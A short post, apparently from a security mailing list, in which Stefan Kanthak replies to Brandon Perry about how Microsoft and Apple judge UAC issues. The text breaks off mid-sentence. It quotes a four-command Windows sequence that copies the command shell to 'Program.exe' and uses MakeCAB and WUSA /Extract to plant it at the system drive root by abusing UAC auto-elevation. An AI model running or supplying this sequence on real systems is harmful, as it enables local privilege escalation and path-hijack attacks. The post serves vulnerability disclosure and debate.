Posted by Stefan Kanthak on Feb 02

“Brandon Perry” <bperry.volatile () gmail com> wrote:

Do you mean something like

Copy %COMSPEC% Program.exe
MakeCAB.Exe Program.exe
Delete Program.exe
WUSA.Exe “%CD%Program.ex_” /Extract:%SystemDrive%

which according to the MSRC (which Apple usually refers to) does not qualify
since it only exploits the braindead autoelevation of the user account
control in its default setting, although every user of…